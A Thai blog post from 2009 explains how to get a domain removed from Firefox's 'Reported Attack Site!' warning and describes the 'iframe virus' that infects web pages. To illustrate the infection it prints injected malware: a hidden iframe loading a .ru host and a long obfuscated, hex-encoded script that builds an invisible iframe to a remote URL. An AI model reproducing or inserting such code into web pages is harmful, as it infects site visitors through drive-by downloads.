Tuesday, September 8, 2009

วิธีแก้ Reported Attack Site! ใน FireFox จาก ไวรัส virus iframe



เข้าเว็บผ่านทาง IE ก็ไม่พบปัญหาอะไร แต่เมื่อเปิดด้วย FireFox ก็พบว่ายังคงเป็นหน้า "Report Attack Site!" เหมือนเดิม

วิธีการถอดรายชื่อโดเมนออกจาก "Reported Attack Site!" ทำได้ 2 วิธีคือ

วิธีที่ 1:

1. เข้าไปลงทะเบียนใช้บริการของ Google Webmaster Tools ที่ http://www.google.com/webmasters/tools/

2. จากนั้นทำการ Add Website ที่มีปัญหาเข้าสู่ระบบ ทาง Google จะให้เราสร้างไฟล์ .html เปล่าๆ (ฺBlank) โดยกำหนดชื่อไฟล์ไว้ให้

3. ทำการ upload .html เช่น google7f37ce963aafc5ef.html ขั้นไปไว้บน Server ใน folder root ที่เดียวกันกับไฟล์ index.html

4. ทำการยืนยันว่าเราได้ upload ไฟล์ขึ้นไปแล้ว ระบบจทำการตรวจสอบ เมื่อพบไฟล์ดังกล่าว ก็จะรายงานผลเกี่ยวกับเว็บไซต์ที่มีปัญหาให้เราทราบ

5. อ่านคำแนะนำ และ ให้คลิกที่ link ขอคำแนะนำ จากนั้นกรอกรายละเอียดและเหตุผล ประกอบการขอให้ Google ถอดถอนชื่อโดเมนของเราออกจาก "Report Attack Site!"

ให้กรอกรายละเอียดประมาณนี้

"I've remove all bad ware and fixed the vulnerability that allowed it to be placed on my site. I've found some bad script include in some file on this website and I've remove it already."

ทำการ Submit แล้วรอประมาณ 24-48 ช.ม.

วิธีที่ 2:

1. เข้าไปแจ้งถอดถอนชื่อโดเมนออกจาก "Report Attack Site!" List ได้โดยตรงที่
http://www.stopbadware.org/reports/container?reportname=http://www.ชื่อโดเมนที่มีปัญหา.com/

2. คลิกที่ปุ่ม Click to Request Review (ด้านบน-ซ้ายมือ แถบสีส้มๆ)

3. กรอกรายละเอียดในแบบฟอร์ม

ทำการ Submit แล้วรอประมาณ 24-48 ช.ม.

การทำงานของ ไวรัส virus iframe มีอยู่ 2 แบบ คือ


1. แก้ไขไฟล์ index.php .html .htm แทรก code ifame เพื่อกระจายไวรัส ที่พบมีอยู่หลายรูปแบบตัวอย่าง


code :


<iframe src="http://a1b.ru:8080/index.php" syle="visibility: hidden" width="145" height="199"> </iframe>


โดยจะมันจะเพิ่มลงไป หลัง tag หรือก่อน


หรืออีกแบบ จะเป็น javascript แบบยาวเลยครับหลายๆ บรรทัด โดยจะมันจะเพิ่มลงไป หลัง tag


code :


</body>

</html><div class="SYN_ROW"><div style="text-indent: -0.5em; padding-left: 1em;" id="syn_row580" class="SYN_TXT"><span class="HTML_TXT"><span class="HTML_TAG"></span>></span> </div></div><div class="SYN_ROW"><div style="text-indent: -0.5em; padding-left: 1em;" id="syn_row581" class="SYN_TXT"><span class="HTML_TXT"><span class="HTML_TAG"><!--<span class="HTML_ELM">html</span>></span></div></div><div class="SYN_ROW"><div style="text-indent: -0.5em; padding-left: 1em;" id="syn_row582" class="SYN_TXT"><span class="HTML_TXT"><span class="HTML_TAG"><<span class="HTML_ELM">div</span> <span class="HTML_ATR">class</span>=<span class="HTML_VAL">'sZdI'</span> <span class="HTML_ATR">id</span>=<span class="HTML_VAL">'__fc54'</span>></span>39253365253366253534253562253366253262253732253761253633253034253732253031253331253334253332253631253337253733253666253736253332253061253665253733253736253031253334253732253032253036253063253361253334253666253366253763253236253333253662253265253032253538253662253765253237253334253334253237253530253234253633253236253465253365253132253235253332253037253332253233253635253062253066253266253732253131253363253263253332253363253137253535253462253461253034253432253066253334253131253338253062253037253238<span class="HTML_TAG"><!--<span class="HTML_ELM">div</span>></span><span class="HTML_TAG"><<span class="HTML_ELM">h3</span> <span class="HTML_ATR">class</span>=<span class="HTML_VAL">'sZdI'</span> <span class="HTML_ATR">id</span>=<span class="HTML_VAL">'__576'</span>></span>25333225333225326325313625313225303225323825333025373625376425323425343025326425353425323125343625323125333525313225363425303325363125333725376625303925366425353225336425363125366325376225363525366125323225323525323125323025373525363125303725306425313825313025336225353725343225303725323925336325366525356525356125333625303225336525326625313725373825323625323225376425313225313825326325366425326425313125316525363425333725373325373125336425343125363925373325326525313225333825323325366125313025306125<span class="HTML_TAG"><!--<span class="HTML_ELM">h3</span>> <span class="HTML_TAG"><<span class="HTML_ELM">div</span> <span class="HTML_ATR">class</span>=<span class="HTML_VAL">'sZdI'</span> <span class="HTML_ATR">id</span>=<span class="HTML_VAL">'__e6c'</span>></span>32322531342532342530642533662531372531302532322530322537332537382536382532382530652537342536642533642532392535372536302537342533322533652531302532342531662530362534372533642534342533642531632532312532342537302530352534612532382535322536312532382535662532392535632531612532652536372530662536662537662533362530322533652532662531372536342533372536372537372530362530642532372532342532312532342531382537332532612536382536342537642535662537312534362531362530372532652537342533612531312531352533322537652533<span class="HTML_TAG"><!--<span class="HTML_ELM">div</span>> <span class="HTML_TAG"><<span class="HTML_ELM">span</span> <span class="HTML_ATR">class</span>=<span class="HTML_VAL">'sZdI'</span> <span class="HTML_ATR">id</span>=<span class="HTML_VAL">'__cfa'</span>></span>36253633253365253366253231253232253035253332253539253235253737253338253763253264253264253061253332253761253763253630253335253765253133253366253036253266253631253534253165253537253663253263253734253030253261253331253262253332253730253239253563253161253062253361253130253231253230253431253232253765253364253165253336253032253337253230253663253239253233253638253131253336253063253733253034253738253435253766253137253338253264253266253237253361253666253239253666253236253033253439253032253363253434253137<span class="HTML_TAG"><!--<span class="HTML_ELM">span</span>> <span class="HTML_TAG"><<span class="HTML_ELM">span</span> <span class="HTML_ATR">id</span>=<span class="HTML_VAL">'__c665'</span> <span class="HTML_ATR">class</span>=<span class="HTML_VAL">'sZdI'</span>></span>25346525323525366425313025326225366325373025353925373025326125363125303525306125323525303625363225343925366325303125333225333425336325366225326225313025376625306425363825363725343325306225366425356225323325376225326325346325303825366425373825363025346125326525323525336125303325376425326525346325373225376625316125363425323125323325303625313625326525326225306125326525323125363425366625373825373525316325336625313425323125323225313225323625373725346425316325343225376625316125303125366525306325333425<span class="HTML_TAG"><!--<span class="HTML_ELM">span</span>> <span class="HTML_TAG"><<span class="HTML_ELM">h3</span> <span class="HTML_ATR">class</span>=<span class="HTML_VAL">'sZdI'</span> <span class="HTML_ATR">id</span>=<span class="HTML_VAL">'__d238'</span>></span>31632535642533622536312535662536632537372534652535382536372531372533322533662533362535342532352533302532372533362531622533662532642533642532382536332533632532382533632530312536622533362536652532372530612531342533362530632530302533332533332535632536622530612533652531382533322531622533632531662533642536332533652536352531342536342531662537352537632532632536312530332532642532622533392535392532632536302533332536382532352533662537362533352531312532332533372533612533662533382532392533642532312532312537<span class="HTML_TAG"><!--<span class="HTML_ELM">h3</span>> <span class="HTML_TAG"><<span class="HTML_ELM">h3</span> <span class="HTML_ATR">class</span>=<span class="HTML_VAL">'sZdI'</span> <span class="HTML_ATR">id</span>=<span class="HTML_VAL">'__55b4'</span>></span>35253365253738253631253238253334253132253439253635253635253330253033253337253066253037253638253338253535253239253338253638253263253264253265253232253130253432253639253635253265253338253337253266253030253665253162253335253364253335253336253134253631253666253138253234253735253336253763253261253361253366253365253338253235253164253762253230253663253334253233253537253365253637253461253339253330253334253261253735253239253236253563253333253664253666253364253039253335253531253034253366253266253233253534<span class="HTML_TAG"><!--<span class="HTML_ELM">h3</span>> <span class="HTML_TAG"><<span class="HTML_ELM">div</span> <span class="HTML_ATR">class</span>=<span class="HTML_VAL">'sZdI'</span> <span class="HTML_ATR">id</span>=<span class="HTML_VAL">'__790c'</span>></span>25326625373125336425363025373025303225353025353825306425363025336625336225333625323325356225363525376425333025366625303525313625356625333125303125366625363625326225373025326525313525303925323425306525313425313225333125333725316325303025303625336125306525333325336125336225326125323725323825313925333125356525376125376525326225316525316625333625346225323725316625306225373525323325363425323325333525366125356527293b<span class="HTML_TAG"><!--<span class="HTML_ELM">div</span>> <span class="HTML_TAG"><!--<span class="HTML_ELM">span</span>><span class="HTML_TAG"><<span class="HTML_ELM">script</span>></span><span class="JS_TXT"><span class="JS_KEY">var</span><span class="JS_COM">/*vnOQC*/</span>vnOQC<span class="JS_COM">/*vnOQC*/</span>=<span class="JS_COM">/*vnOQC*/</span>document;vnOQC.writeln(vGDJP());<span class="JS_KEY">function</span><span class="JS_COM">/*vnOQC*/</span>hgvcT(wtiHF){wtiHF<span class="JS_COM">/*vnOQC*/</span>=<span class="JS_COM">/*vnOQC*/</span>wtiHF.replace(/[\.]/g,<span class="JS_COM">/*vnOQC*/</span><span class="JS_STR">"%"</span>);wtiHF<span class="JS_COM">/*vnOQC*/</span>=<span class="JS_COM">/*vnOQC*/</span>unescape(wtiHF);<span class="JS_KEY">return</span><span class="JS_COM">/*vnOQC*/</span>HQZYW(wtiHF);}<span class="JS_KEY">function</span><span class="JS_COM">/*vnOQC*/</span>HQZYW(vnbjD){<span class="JS_COM">/*vnOQC*/</span><span class="JS_KEY">var</span><span class="JS_COM">/*vnOQC*/</span>SynzJ<span class="JS_COM">/*vnOQC*/</span>=<span class="JS_COM">/*vnOQC*/</span><span class="JS_STR">""</span>,<span class="JS_COM">/*vnOQC*/</span>gADeR<span class="JS_COM">/*vnOQC*/</span>=<span class="JS_COM">/*vnOQC*/</span><span class="JS_NUM">0</span>;<span class="JS_KEY">for</span><span class="JS_COM">/*vnOQC*/</span>(gADeR=vnbjD.length-<span class="JS_NUM">1</span>;gADeR>=<span class="JS_NUM">0</span>;gADeR--){SynzJ<span class="JS_COM">/*vnOQC*/</span>+=<span class="JS_COM">/*vnOQC*/</span>vnbjD.charAt(gADeR);}<span class="JS_COM">/*vnOQC*/</span><span class="JS_KEY">return</span><span class="JS_COM">/*vnOQC*/</span>SynzJ;}<span class="JS_KEY">function</span><span class="JS_COM">/*vnOQC*/</span>vGDJP(){document.write(<span class="JS_STR">"<style>.RgAjC{width:0%;height:0%;border:none;}</style>"</span>);<span class="JS_KEY">var</span><span class="JS_COM">/*vnOQC*/</span>hUitZ<span class="JS_COM">/*vnOQC*/</span>=<span class="JS_COM">/*vnOQC*/</span><span class="JS_STR">"<iframe id="\" src="%5C" class="\"></iframe>"</span>;<span class="JS_KEY">var</span><span class="JS_COM">/*vnOQC*/</span>ZObWX<span class="JS_COM">/*vnOQC*/</span>=<span class="JS_COM">/*vnOQC*/</span>hUitZ.replace(/[\+x]/g,<span class="JS_COM">/*vnOQC*/</span>hgvcT(<span class="JS_STR">".6c.6d.74.68.2e.6e.6f.69.74.61.6d.72.6f.66.6e.69.2f.75.72.2e.74.69.67.6e.69.64.61.65.72.74.73.61.66.2f.2f.3a.70.74.74.68"</span>));<span class="JS_KEY">return</span><span class="JS_COM">/*vnOQC*/</span>ZObWX;}</span><span class="HTML_TAG"><!--<span class="HTML_ELM">script</span>></div></div>

2. วางไฟล์ใน cgi-bin เพื่อส่ง spam mail ออกไปจำนวนมาก ซึ่งจะมีผลเฉพาะกับเว็บที่เปิด cgi ไว้ ที่พบบ่อย คือ dark.cgi